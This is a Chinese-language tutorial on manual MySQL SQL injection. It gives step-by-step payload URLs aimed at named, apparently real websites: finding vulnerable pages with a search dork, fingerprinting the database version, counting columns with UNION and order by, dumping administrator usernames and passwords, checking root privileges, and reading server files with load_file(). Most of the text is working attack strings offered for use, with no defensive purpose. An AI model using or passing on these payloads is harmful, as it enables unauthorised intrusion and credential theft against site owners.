MySQL手工注入

搜索php网站

inurl:php?id=

判断是否存在注入漏洞

例如得到网站:http://www.star-reach.com/gallery.php?id=27

加上and 1=1提交,返回正常:

image.png

加上and 1=2提交,返回错误:

image.png

通过上面两个结果就可以确定该网站存在注入漏洞,接下来判断其后台数据库,在目前的数据库系统中,只有MySQL数据库支持/*注释,所以可以利用它来判断后台是否是MySQL,以下试验http://www.star-reach.com/gallery.php?id=27/* 返回正常,说明后台数据库就是MySQL,但是也要随机 应变。

image.png

判断MySQL数据库的版本

为什么要判断MySQL数据库版本?

当然是因为不同的版本对注入的结果会产生很大的影响。在MySQL版本4(包括版本4)新增了一个联合查询(UNION)的功能,比如SQL语句1 UNION SQL语句2,提交之后我们的SQL语句和SQL语句2都会被执行,这个功能使得MySQL发生SQL注入漏洞的危险性大大提高,利用它可以轻易的获取数据库中其他数据表的信息。

判断语句

and ord(mid(version(),1,1))>51/*

例如:

http://www.star-reach.com/gallery.php?id=27%20and%20ord(mid(version(),1,1))%3E51/*

提交以上语句,返回正常,说明这个数据库版本大于4.0,如果返回错误的话,就说明是小于4,0版本,即不支持UNION 查询。
数据库的version()函数的作用是数据库的版本信息。
ASCII码51代表3,这里的大于3当然就是4.0以上版本啦!

/*!...*/

在MySQL数据库中,有一个其他数据库没有的扩展功能,它可以用/!.../这种注释语句来实现各版本功能的兼容。例如通过如下语句测试网站,返回错误,那么几乎可以确定网站后台数据库为MySQL了。

http://www.star-reach.com/gallery.php?id=27/*!%20s*/
image.png

定位MySQL版本

在URL输入:
/*!30000%20s*/,如果返回错误的话,说明MySQL的版本大于3.0
/*!40000%20s*/,如果返回错误的话,说明MySQL的版本大于4.0
/*!50000%20s*/,如果返回错误的话,说明MySQL的版本大于5.0
/*!50000%20s*/,如果返回正确的话,说明MySQL的版本小于6.0
获得更精确的版本:
/*!50046%20s*/返回正常,说明MySQL版本小于5.0.46
/*!50045%20s*/返回错误页面,说明该MySQL版本为5.0.45
image.png

image.png

确定当前数据库的字段数目

UNION(联合查询)

在利用联合查询(UNION)字段数目时,要求前面的SQL语句和后面的SQL语句2的字段数要相同,否则就会出错。我们可以利用联合查询字段数目不匹配返回错误的这个特性来准确获得查询语句查询的字段数目。我看可以提交union select 1,1,1,1,1及其类似的语句,通过不断增加1,当页面返回正确,那么第一个SQL语句1中的字段数目就是union后多少个1的数目。

order by

利用order by后加数字,MySQL会解释成按照第几列排序,如果查询没有我们提交的数字的那么多页就会返回错误。

http://www.star-reach.com/product_list.php?pid=53 order by 6 返回正常
http://www.star-reach.com/product_list.php?pid=53 order by 7 返回错误
说明字段是6个
image.png

image.png

获得当前数据库的表名

以《精通脚本黑客》的例子为示例 P165
利用方法: union select 字段数 from 表名
例如:http://www.shidaiguocui.com/guide_show.php?id=32 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from admin
返回结果正常,说明admin这个表名存在,而且在页面中还有一些数字。如下图所示。如果不存在就会返回错误页面。可以更换表名来测试其他表名。

image.png

在上图中,得到几个数字,分别是2、3、4、5、7、9、10,他们的作用是分别代表的第几个字段,更重要的是我们可以用其他的函数或字符代替这些字段。例如我们要查看数据库版本时用到的是version()函数,只要将version()放在上面几个字段中的任何一个就可以得到当前的数据库版本,例如提交http://www.shidaiguocui.com/guide_show.php?id=32 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13 from admin 那么就会在第二个字段处出现数据库版本的信息;

例如提交http://www.shidaiguocui.com/guide_show.php?id=32 union select 1,username,3,4,5,6,7,8,9,10,11,12,13 from admin 就可以看到当前管理员的用户名,如下图所示

image.png

例如提交http://www.shidaiguocui.com/guide_show.php?id=32 union select 1,password,3,4,5,6,7,8,9,10,11,12,13 from admin 就暴出了当前管理员的密码,当然这只是admin表中的第一条记录,如下图所示

image.png

获得表中其它行的记录

通过主键字段获取

假设id是主键,获得admin中第二条记录的信息:
http://www.shidaiguocui.com/guide_show.php?id=32 union select 1,password,3,4,5,6,7,8,9,10,11,12,13 from admin where id=2
id后面的数字是管理员的编号,是唯一的

这个查询其它记录的功能非常的有用,我们也知道现在几乎所有的网站都是经过了MD5加密,如果那个密码设置的很变态的话,我们很难破解。不能被破解,系统又没有如cookie欺骗之类的漏洞,那么我们得到了加密后的密码也是没有用。而我们查询其它的记录,那么就很有可能其它的记录的密码不是很强壮,破解的几率就很大。

判断是否是root权限

http://www.shidaiguocui.com/guide_show.php?id=32 and ord(mid(user(),1,1))=114/*
如果返回正确,则说明是root权限
image.png

判断是否具有文件读写的权限

and (select count(*) from MySQL.user) > 0

使用load_file()函数读取文件

注:使用此函数需要就有root权限(超级管理员)

读取c:/boot.ini中的信息
http://www.shidaiguocui.com/guide_show.php?id=32 union select 1,load_file(0x633A2F626F6F742E696E69),3,4,5,6,7,8,9,10,11,12,13 from admin 
注:0x633A2F626F6F742E696E69是c:/boot.ini的十六进制,使用十六进制可以防止我们提交的数据被PHP转义掉

你可能感兴趣的:(MySQL手工注入)